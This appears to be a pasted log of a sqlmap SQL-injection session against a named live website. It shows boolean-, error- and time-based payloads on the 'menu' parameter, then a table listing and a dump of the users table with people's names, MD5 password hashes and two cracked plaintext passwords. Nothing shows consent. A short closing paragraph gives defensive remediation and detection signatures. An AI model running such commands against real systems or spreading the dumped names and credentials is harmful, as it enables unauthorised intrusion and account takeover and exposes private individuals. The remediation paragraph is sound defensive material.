View difference between Paste ID: tnS7BPNh and Ep8AGd0Q
1
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent --dbs
2
3
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet --tables
4
5
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
6
    http://sqlmap.org
7
8
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
9
10
[*] starting at 22:14:54
11
12
[22:14:54] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Opera/9.52 (X11; Linux x86_64; U; en)
13
[22:14:55] [INFO] resuming back-end DBMS 'mysql' 
14
[22:15:03] [INFO] testing connection to the target url
15
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
16
---
17
Place: GET
18
Parameter: menu
19
    Type: boolean-based blind
20
    Title: AND boolean-based blind - WHERE or HAVING clause
21
    Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk
22
23
    Type: error-based
24
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
25
    Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG
26
27
    Type: AND/OR time-based blind
28
    Title: MySQL > 5.0.11 AND time-based blind
29
    Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
30
---
31
32
[22:15:10] [INFO] the back-end DBMS is MySQL
33
34
web application technology: PHP 5.2.6, Apache
35
back-end DBMS: MySQL 5.0
36
[22:15:10] [INFO] fetching tables for database: 'gymsticknet'
37
[22:15:23] [INFO] heuristics detected web page charset 'ascii'
38
[22:15:23] [INFO] the SQL query used returns 134 entries
39
[22:15:24] [INFO] retrieved: afb_accounts
40
[22:15:24] [INFO] retrieved: afb_accounts_has_perms
41
[22:15:25] [INFO] retrieved: afb_blacklist_dirs
42
[22:15:25] [INFO] retrieved: afb_blacklist_ext
43
[22:15:26] [INFO] retrieved: afb_blacklist_files
44
[22:15:26] [INFO] retrieved: afb_log
45
[22:15:27] [INFO] retrieved: afb_settings
46
[22:15:28] [INFO] retrieved: afb_shares
47
[22:15:28] [INFO] retrieved: bh2_aclgroups
48
[22:15:30] [INFO] retrieved: bh2_aclpublic
49
[22:15:31] [INFO] retrieved: bh2_aclusers
50
[22:15:31] [INFO] retrieved: bh2_adminmodulesmenu
51
[22:15:32] [INFO] retrieved: bh2_bandwidth
52
[22:15:32] [INFO] retrieved: bh2_config
53
[22:15:34] [INFO] retrieved: bh2_filecodereminders
54
[22:15:34] [INFO] retrieved: bh2_filecodes
55
[22:15:35] [INFO] retrieved: bh2_groupusers
56
[22:15:36] [INFO] retrieved: bh2_log
57
[22:15:36] [INFO] retrieved: bh2_logactions
58
[22:15:37] [INFO] retrieved: bh2_metadata
59
[22:15:39] [INFO] retrieved: bh2_modules
60
[22:15:39] [INFO] retrieved: bh2_modulesaccesslevel
61
[22:15:40] [INFO] retrieved: bh2_modulesdirectory
62
[22:15:40] [INFO] retrieved: bh2_modulesfiletype
63
[22:15:41] [INFO] retrieved: bh2_modulesmenu
64
[22:15:42] [INFO] retrieved: bh2_modulesusertype
65
[22:15:43] [INFO] retrieved: bh2_packages
66
[22:15:43] [INFO] retrieved: bh2_passwordresets
67
[22:15:45] [INFO] retrieved: bh2_registrations
68
[22:15:46] [INFO] retrieved: bh2_satellitetransfers
69
[22:15:46] [INFO] retrieved: bh2_texts
70
[22:15:47] [INFO] retrieved: bh2_uploads
71
[22:15:48] [INFO] retrieved: bh2_userinfo
72
[22:15:50] [INFO] retrieved: bh2_users
73
[22:15:51] [INFO] retrieved: bh2_usersviews
74
[22:15:53] [INFO] retrieved: contacts
75
[22:15:55] [INFO] retrieved: countries
76
[22:15:57] [INFO] retrieved: downloads_agreements
77
[22:15:59] [INFO] retrieved: downloads_categories
78
[22:16:00] [INFO] retrieved: downloads_comments
79
[22:16:02] [INFO] retrieved: downloads_config
80
[22:16:04] [INFO] retrieved: downloads_customfields
81
[22:16:06] [INFO] retrieved: downloads_customfields_data
82
[22:16:07] [INFO] retrieved: downloads_files
83
[22:16:09] [INFO] retrieved: downloads_ip_restrict
84
[22:16:10] [INFO] retrieved: downloads_ip_restrict_log
85
[22:16:10] [INFO] retrieved: downloads_languages
86
[22:16:11] [INFO] retrieved: downloads_leech_settings
87
[22:16:12] [INFO] retrieved: downloads_mirrors
88
[22:16:12] [INFO] retrieved: downloads_permissions
89
[22:16:13] [INFO] retrieved: downloads_recommend_blocklist
90
[22:16:13] [INFO] retrieved: downloads_recommend_log
91
[22:16:14] [INFO] retrieved: downloads_stats
92
[22:16:14] [INFO] retrieved: downloads_usergroups
93
[22:16:15] [INFO] retrieved: downloads_userpermissions
94
[22:16:16] [INFO] retrieved: downloads_users
95
[22:16:16] [INFO] retrieved: files
96
[22:16:17] [INFO] retrieved: folders
97
[22:16:17] [INFO] retrieved: intrausers
98
[22:16:18] [INFO] retrieved: ipfm_groups
99
[22:16:19] [INFO] retrieved: ipfm_reg_antispam
100
[22:16:19] [INFO] retrieved: ipfm_validating
101
[22:16:20] [INFO] retrieved: menu
102
[22:16:21] [INFO] retrieved: pages
103
[22:16:21] [INFO] retrieved: pfn_accesos
104
[22:16:22] [INFO] retrieved: pfn_arquivos
105
[22:16:22] [INFO] retrieved: pfn_arquivos_campos_palabras
106
[22:16:23] [INFO] retrieved: pfn_bloqueo_ip
107
[22:16:23] [INFO] retrieved: pfn_campos
108
[22:16:24] [INFO] retrieved: pfn_configuracions
109
[22:16:25] [INFO] retrieved: pfn_configuracions_datos
110
[22:16:25] [INFO] retrieved: pfn_directorios
111
[22:16:26] [INFO] retrieved: pfn_grupos
112
[22:16:26] [INFO] retrieved: pfn_palabras
113
[22:16:27] [INFO] retrieved: pfn_raices
114
[22:16:27] [INFO] retrieved: pfn_raices_grupos_configuracions
115
[22:16:28] [INFO] retrieved: pfn_raices_usuarios
116
[22:16:29] [INFO] retrieved: pfn_sesions
117
[22:16:29] [INFO] retrieved: pfn_usuarios
118
[22:16:30] [INFO] retrieved: phpwebgallery_caddie
119
[22:16:31] [INFO] retrieved: phpwebgallery_categories
120
[22:16:31] [INFO] retrieved: phpwebgallery_comments
121
[22:16:32] [INFO] retrieved: phpwebgallery_config
122
[22:16:32] [INFO] retrieved: phpwebgallery_download_multi
123
[22:16:33] [INFO] retrieved: phpwebgallery_favorites
124
[22:16:34] [INFO] retrieved: phpwebgallery_group_access
125
[22:16:36] [INFO] retrieved: phpwebgallery_groups
126
[22:16:36] [INFO] retrieved: phpwebgallery_history
127
[22:16:37] [INFO] retrieved: phpwebgallery_history_summary
128
[22:16:38] [INFO] retrieved: phpwebgallery_image_category
129
[22:16:38] [INFO] retrieved: phpwebgallery_image_tag
130
[22:16:39] [INFO] retrieved: phpwebgallery_images
131
[22:16:39] [INFO] retrieved: phpwebgallery_old_permalinks
132
[22:16:40] [INFO] retrieved: phpwebgallery_plugins
133
[22:16:41] [INFO] retrieved: phpwebgallery_rate
134
[22:16:41] [INFO] retrieved: phpwebgallery_search
135
[22:16:42] [INFO] retrieved: phpwebgallery_sessions
136
[22:16:42] [INFO] retrieved: phpwebgallery_sites
137
[22:16:43] [INFO] retrieved: phpwebgallery_tags
138
[22:16:43] [INFO] retrieved: phpwebgallery_upgrade
139
[22:16:44] [INFO] retrieved: phpwebgallery_user_access
140
[22:16:45] [INFO] retrieved: phpwebgallery_user_cache
141
[22:16:45] [INFO] retrieved: phpwebgallery_user_cache_categories
142
[22:16:46] [INFO] retrieved: phpwebgallery_user_feed
143
[22:16:47] [INFO] retrieved: phpwebgallery_user_group
144
[22:16:47] [INFO] retrieved: phpwebgallery_user_infos
145
[22:16:48] [INFO] retrieved: phpwebgallery_user_mail_notification
146
[22:16:48] [INFO] retrieved: phpwebgallery_users
147
[22:16:49] [INFO] retrieved: phpwebgallery_waiting
148
[22:16:53] [INFO] retrieved: phpwebgallery_ws_access
149
[22:16:54] [INFO] retrieved: relay_clients
150
[22:16:54] [INFO] retrieved: relay_filesystem
151
[22:16:55] [INFO] retrieved: relay_log
152
[22:16:56] [INFO] retrieved: relay_permissions
153
[22:16:57] [INFO] retrieved: relay_users
154
[22:16:58] [INFO] retrieved: spages
155
[22:16:58] [INFO] retrieved: submenu
156
[22:16:59] [INFO] retrieved: tc_acp_label_states
157
[22:17:00] [INFO] retrieved: tc_admin_cp_false_logins
158
[22:17:01] [INFO] retrieved: tc_banned_ips
159
[22:17:01] [INFO] retrieved: tc_error_log
160
[22:17:02] [INFO] retrieved: tc_forum_integration
161
[22:17:03] [INFO] retrieved: tc_installed_plugins
162
[22:17:03] [INFO] retrieved: tc_membergroups
163
[22:17:04] [INFO] retrieved: tc_members
164
[22:17:05] [INFO] retrieved: tc_menu
165
[22:17:05] [INFO] retrieved: tc_pages
166
[22:17:06] [INFO] retrieved: tc_plugin_lists
167
[22:17:06] [INFO] retrieved: tc_plugins
168
[22:17:07] [INFO] retrieved: tc_sessions
169
[22:17:07] [INFO] retrieved: tc_settings
170
[22:17:08] [INFO] retrieved: tc_statistics_visitors
171
[22:17:09] [INFO] retrieved: test
172
[22:17:09] [INFO] retrieved: users
173
Database: gymsticknet
174
[134 tables]
175
+--------------------------------------+
176
| afb_accounts                         |
177
| afb_accounts_has_perms               |
178
| afb_blacklist_dirs                   |
179
| afb_blacklist_ext                    |
180
| afb_blacklist_files                  |
181
| afb_log                              |
182
| afb_settings                         |
183
| afb_shares                           |
184
| bh2_aclgroups                        |
185
| bh2_aclpublic                        |
186
| bh2_aclusers                         |
187
| bh2_adminmodulesmenu                 |
188
| bh2_bandwidth                        |
189
| bh2_config                           |
190
| bh2_filecodereminders                |
191
| bh2_filecodes                        |
192
| bh2_groupusers                       |
193
| bh2_log                              |
194
| bh2_logactions                       |
195
| bh2_metadata                         |
196
| bh2_modules                          |
197
| bh2_modulesaccesslevel               |
198
| bh2_modulesdirectory                 |
199
| bh2_modulesfiletype                  |
200
| bh2_modulesmenu                      |
201
| bh2_modulesusertype                  |
202
| bh2_packages                         |
203
| bh2_passwordresets                   |
204
| bh2_registrations                    |
205
| bh2_satellitetransfers               |
206
| bh2_texts                            |
207
| bh2_uploads                          |
208
| bh2_userinfo                         |
209
| bh2_users                            |
210
| bh2_usersviews                       |
211
| contacts                             |
212
| countries                            |
213
| downloads_agreements                 |
214
| downloads_categories                 |
215
| downloads_comments                   |
216
| downloads_config                     |
217
| downloads_customfields               |
218
| downloads_customfields_data          |
219
| downloads_files                      |
220
| downloads_ip_restrict                |
221
| downloads_ip_restrict_log            |
222
| downloads_languages                  |
223
| downloads_leech_settings             |
224
| downloads_mirrors                    |
225
| downloads_permissions                |
226
| downloads_recommend_blocklist        |
227
| downloads_recommend_log              |
228
| downloads_stats                      |
229
| downloads_usergroups                 |
230
| downloads_userpermissions            |
231
| downloads_users                      |
232
| files                                |
233
| folders                              |
234
| intrausers                           |
235
| ipfm_groups                          |
236
| ipfm_reg_antispam                    |
237
| ipfm_validating                      |
238
| menu                                 |
239
| pages                                |
240
| pfn_accesos                          |
241
| pfn_arquivos                         |
242
| pfn_arquivos_campos_palabras         |
243
| pfn_bloqueo_ip                       |
244
| pfn_campos                           |
245
| pfn_configuracions                   |
246
| pfn_configuracions_datos             |
247
| pfn_directorios                      |
248
| pfn_grupos                           |
249
| pfn_palabras                         |
250
| pfn_raices                           |
251
| pfn_raices_grupos_configuracions     |
252
| pfn_raices_usuarios                  |
253
| pfn_sesions                          |
254
| pfn_usuarios                         |
255
| phpwebgallery_caddie                 |
256
| phpwebgallery_categories             |
257
| phpwebgallery_comments               |
258
| phpwebgallery_config                 |
259
| phpwebgallery_download_multi         |
260
| phpwebgallery_favorites              |
261
| phpwebgallery_group_access           |
262
| phpwebgallery_groups                 |
263
| phpwebgallery_history                |
264
| phpwebgallery_history_summary        |
265
| phpwebgallery_image_category         |
266
| phpwebgallery_image_tag              |
267
| phpwebgallery_images                 |
268
| phpwebgallery_old_permalinks         |
269
| phpwebgallery_plugins                |
270
| phpwebgallery_rate                   |
271
| phpwebgallery_search                 |
272
| phpwebgallery_sessions               |
273
| phpwebgallery_sites                  |
274
| phpwebgallery_tags                   |
275
| phpwebgallery_upgrade                |
276
| phpwebgallery_user_access            |
277
| phpwebgallery_user_cache             |
278
| phpwebgallery_user_cache_categories  |
279
| phpwebgallery_user_feed              |
280
| phpwebgallery_user_group             |
281
| phpwebgallery_user_infos             |
282
| phpwebgallery_user_mail_notification |
283
| phpwebgallery_users                  |
284
| phpwebgallery_waiting                |
285
| phpwebgallery_ws_access              |
286
| relay_clients                        |
287
| relay_filesystem                     |
288
| relay_log                            |
289
| relay_permissions                    |
290
| relay_users                          |
291
| spages                               |
292
| submenu                              |
293
| tc_acp_label_states                  |
294
| tc_admin_cp_false_logins             |
295
| tc_banned_ips                        |
296
| tc_error_log                         |
297
| tc_forum_integration                 |
298
| tc_installed_plugins                 |
299
| tc_membergroups                      |
300
| tc_members                           |
301
| tc_menu                              |
302
| tc_pages                             |
303
| tc_plugin_lists                      |
304
| tc_plugins                           |
305
| tc_sessions                          |
306
| tc_settings                          |
307
| tc_statistics_visitors               |
308
| test                                 |
309
| users                                |
310
+--------------------------------------+
311
312
[22:17:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'
313
314
[*] shutting down at 22:17:10
315
316
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users --columns
317
318
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
319
    http://sqlmap.org
320
321
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
322
323
[*] starting at 22:21:35
324
325
[22:21:35] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows NT 5.1; U; ; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52
326
[22:21:36] [INFO] resuming back-end DBMS 'mysql' 
327
[22:21:37] [INFO] testing connection to the target url
328
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
329
---
330
Place: GET
331
Parameter: menu
332
    Type: boolean-based blind
333
    Title: AND boolean-based blind - WHERE or HAVING clause
334
    Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk
335
336
    Type: error-based
337
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
338
    Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG
339
340
    Type: AND/OR time-based blind
341
    Title: MySQL > 5.0.11 AND time-based blind
342
    Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
343
---
344
345
[22:21:38] [INFO] the back-end DBMS is MySQL
346
347
web application technology: PHP 5.2.6, Apache
348
back-end DBMS: MySQL 5.0
349
[22:21:38] [INFO] fetching columns for table 'users' in database 'gymsticknet'
350
[22:21:39] [INFO] heuristics detected web page charset 'ascii'
351
[22:21:39] [INFO] the SQL query used returns 5 entries
352
[22:21:40] [INFO] retrieved: id
353
[22:21:40] [INFO] retrieved: int(11)
354
[22:21:41] [INFO] retrieved: name
355
[22:21:42] [INFO] retrieved: varchar(255)
356
[22:21:42] [INFO] retrieved: username
357
[22:21:43] [INFO] retrieved: varchar(255)
358
[22:21:43] [INFO] retrieved: password
359
[22:21:44] [INFO] retrieved: varchar(255)
360
[22:21:44] [INFO] retrieved: super
361
[22:21:45] [INFO] retrieved: tinyint(1)
362
Database: gymsticknet
363
Table: users
364
[5 columns]
365
+----------+--------------+
366
| Column   | Type         |
367
+----------+--------------+
368
| id       | int(11)      |
369
| name     | varchar(255) |
370
| password | varchar(255) |
371
| super    | tinyint(1)   |
372
| username | varchar(255) |
373
+----------+--------------+
374
375
[22:21:45] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'
376
377
[*] shutting down at 22:21:45
378
379
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users -C name --dump
380
381
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
382
    http://sqlmap.org
383
384
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
385
386
[*] starting at 22:24:37
387
388
[22:24:37] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19
389
[22:24:38] [INFO] resuming back-end DBMS 'mysql' 
390
[22:24:40] [INFO] testing connection to the target url
391
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
392
---
393
Place: GET
394
Parameter: menu
395
    Type: boolean-based blind
396
    Title: AND boolean-based blind - WHERE or HAVING clause
397
    Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk
398
399
    Type: error-based
400
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
401
    Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG
402
403
    Type: AND/OR time-based blind
404
    Title: MySQL > 5.0.11 AND time-based blind
405
    Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
406
---
407
408
[22:24:43] [INFO] the back-end DBMS is MySQL
409
410
web application technology: PHP 5.2.6, Apache
411
back-end DBMS: MySQL 5.0
412
do you want sqlmap to consider provided column(s):
413
[1] as LIKE column names (default)
414
[2] as exact column names
415
> 2
416
417
[22:24:47] [INFO] fetching columns 'name' for table 'users' in database 'gymsticknet'
418
[22:24:47] [INFO] heuristics detected web page charset 'ascii'
419
[22:24:48] [INFO] the SQL query used returns 1 entries
420
[22:24:48] [INFO] retrieved: name
421
[22:24:49] [INFO] retrieved: varchar(255)
422
[22:24:49] [INFO] fetching entries of column(s) 'name' for table 'users' in database 'gymsticknet'
423
[22:24:49] [INFO] the SQL query used returns 4 entries
424
[22:24:50] [INFO] retrieved: antti mikkola
425
[22:24:51] [INFO] retrieved: juha hoo
426
[22:24:51] [INFO] retrieved: keijo pesonen
427
[22:24:52] [INFO] retrieved: testikayttaja
428
[22:24:52] [INFO] analyzing table dump for possible password hashes
429
Database: gymsticknet
430
Table: users
431
[4 entries]
432
+---------------+
433
| name          |
434
+---------------+
435
| antti mikkola |
436
| juha hoo      |
437
| keijo pesonen |
438
| testikayttaja |
439
+---------------+
440
441
[22:24:52] [INFO] table 'gymsticknet.users' dumped to CSV file '/pentest/database/sqlmap/output/www.gymstick.net/dump/gymsticknet/users.csv'
442
[22:24:52] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'
443
444
[*] shutting down at 22:24:52
445
446
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.gymstick.net/index.php?menu=13 --random-agent -D gymsticknet -T users -C password --dump
447
448
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
449
    http://sqlmap.org
450
451
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
452
453
[*] starting at 22:25:42
454
455
[22:25:42] [INFO] fetched random HTTP User-Agent header from file '/pentest/database/sqlmap/txt/user-agents.txt': Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5
456
[22:25:42] [INFO] resuming back-end DBMS 'mysql' 
457
[22:25:43] [INFO] testing connection to the target url
458
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
459
---
460
Place: GET
461
Parameter: menu
462
    Type: boolean-based blind
463
    Title: AND boolean-based blind - WHERE or HAVING clause
464
    Payload: menu=13' AND 9941=9941 AND 'PLXk'='PLXk
465
466
    Type: error-based
467
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
468
    Payload: menu=13' AND (SELECT 8778 FROM(SELECT COUNT(*),CONCAT(0x3a7174753a,(SELECT (CASE WHEN (8778=8778) THEN 1 ELSE 0 END)),0x3a6f687a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'EcaG'='EcaG
469
470
    Type: AND/OR time-based blind
471
    Title: MySQL > 5.0.11 AND time-based blind
472
    Payload: menu=13' AND SLEEP(5) AND 'nibs'='nibs
473
---
474
475
[22:25:45] [INFO] the back-end DBMS is MySQL
476
477
web application technology: PHP 5.2.6, Apache
478
back-end DBMS: MySQL 5.0
479
do you want sqlmap to consider provided column(s):
480
[1] as LIKE column names (default)
481
[2] as exact column names
482
> 2
483
484
[22:25:49] [INFO] fetching columns 'password' for table 'users' in database 'gymsticknet'
485
[22:25:50] [INFO] heuristics detected web page charset 'ascii'
486
[22:25:50] [INFO] the SQL query used returns 1 entries
487
[22:25:51] [INFO] retrieved: password
488
[22:25:51] [INFO] retrieved: varchar(255)
489
[22:25:52] [INFO] fetching entries of column(s) 'password' for table 'users' in database 'gymsticknet'
490
[22:25:52] [INFO] the SQL query used returns 4 entries
491
[22:25:52] [INFO] retrieved: 8d68c0d987f302d0fe6de347245b5587
492
[22:25:53] [INFO] retrieved: 9627df7a4a5b849f67fce863e82adc71
493
[22:25:53] [INFO] retrieved: db2fa9922825f59757dd5fcb5d8e1f2b
494
[22:25:54] [INFO] retrieved: db2fa9922825f59757dd5fcb5d8e1f2b
495
[22:25:54] [INFO] analyzing table dump for possible password hashes
496
recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] y
497
498
[22:26:03] [INFO] using hash method 'md5_generic_passwd'
499
what dictionary do you want to use?
500
[1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
501
[2] custom dictionary file
502
[3] file with list of dictionary files
503
> 1
504
505
[22:26:23] [INFO] using default dictionary
506
[22:26:23] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
507
do you want to use common password suffixes? (slow!) [y/N] y
508
509
[22:26:32] [INFO] starting dictionary-based cracking (md5_generic_passwd)
510
[22:26:32] [INFO] starting 2 processes 
511
[22:27:08] [INFO] cracked password 'testi' for hash '9627df7a4a5b849f67fce863e82adc71'                                                        
512
[22:27:11] [INFO] using suffix '1'                                                                                                            
513
[22:27:40] [INFO] cracked password 'molo1' for hash 'db2fa9922825f59757dd5fcb5d8e1f2b'                                                        
514
[22:27:54] [INFO] using suffix '123'                                                                                                          
515
[22:28:35] [INFO] using suffix '2'                                                                                                            
516
[22:29:17] [INFO] using suffix '12'                                                                                                           
517
[22:29:55] [INFO] using suffix '3'                                                                                                            
518
[22:30:34] [INFO] using suffix '13'                                                                                                           
519
[22:31:12] [INFO] using suffix '7'                                                                                                            
520
[22:31:57] [INFO] using suffix '11'                                                                                                           
521
[22:32:34] [INFO] using suffix '5'                                                                                                            
522
[22:33:23] [INFO] using suffix '22'                                                                                                           
523
[22:34:00] [INFO] using suffix '23'                                                                                                           
524
[22:34:41] [INFO] using suffix '01'                                                                                                           
525
[22:35:36] [INFO] using suffix '4'                                                                                                            
526
[22:36:28] [INFO] using suffix '07'                                                                                                           
527
[22:37:06] [INFO] using suffix '21'                                                                                                           
528
[22:37:44] [INFO] using suffix '14'                                                                                                           
529
[22:38:27] [INFO] using suffix '10'                                                                                                           
530
[22:39:07] [INFO] using suffix '06'                                                                                                           
531
[22:39:42] [INFO] using suffix '08'                                                                                                           
532
[22:40:20] [INFO] using suffix '8'                                                                                                            
533
[22:40:58] [INFO] using suffix '15'                                                                                                           
534
[22:41:38] [INFO] using suffix '69'                                                                                                           
535
[22:42:17] [INFO] using suffix '16'                                                                                                           
536
[22:42:52] [INFO] using suffix '6'                                                                                                            
537
[22:43:27] [INFO] using suffix '18'                                                                                                           
538
[22:44:06] [INFO] using suffix '!'                                                                                                            
539
[22:44:44] [INFO] using suffix '.'                                                                                                            
540
[22:45:21] [INFO] using suffix '*'                                                                                                            
541
[22:45:58] [INFO] using suffix '!!'                                                                                                           
542
[22:46:32] [INFO] using suffix '?'                                                                                                            
543
[22:47:13] [INFO] using suffix ';'                                                                                                            
544
[22:47:49] [INFO] using suffix '..'                                                                                                           
545
[22:48:32] [INFO] using suffix '!!!'                                                                                                          
546
[22:49:17] [INFO] using suffix ','                                                                                                            
547
[22:49:54] [INFO] using suffix '@'                                                                                                            
548
[22:50:33] [INFO] writing uncracked hashes to file '/tmp/tmpzshPZE.txt' for eventual further processing                                       
549
[22:50:33] [INFO] postprocessing table dump
550
Database: gymsticknet
551
Table: users
552
[4 entries]
553
+------------------------------------------+
554
| password                                 |
555
+------------------------------------------+
556
| 8d68c0d987f302d0fe6de347245b5587         |
557
| 9627df7a4a5b849f67fce863e82adc71 (testi) |
558
| db2fa9922825f59757dd5fcb5d8e1f2b (molo1) |
559
| db2fa9922825f59757dd5fcb5d8e1f2b (molo1) |
560
+------------------------------------------+
561
562
[22:50:33] [INFO] table 'gymsticknet.users' dumped to CSV file '/pentest/database/sqlmap/output/www.gymstick.net/dump/gymsticknet/users.csv'
563
[22:50:33] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.gymstick.net'
564
565
[*] shutting down at 22:50:33
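Review bot: The transcript shows two application defects and no fix for either: the `menu` GET parameter accepts boolean-, error- and time-based payloads, and `users.password` holds fast, apparently unsalted MD5 values. The injection pattern (`menu=13' AND ...`) is consistent with the value being concatenated into a quoted SQL string, though the PHP source is not shown; the remedy is a prepared statement with a bound parameter plus an integer check on `menu`. sqlmap matched the hashes as `md5_generic_passwd` and recovered two of the three distinct values from its default wordlist in about a minute, and two rows share one hash, so there is no per-user salt; a slow salted scheme such as bcrypt or Argon2 belongs there, followed by a forced reset of the exposed accounts. For detection, the request logs should show `SLEEP(`, `INFORMATION_SCHEMA` and `FLOOR(RAND(0)*2)` in the query string, with a different User-Agent on each run within a few minutes.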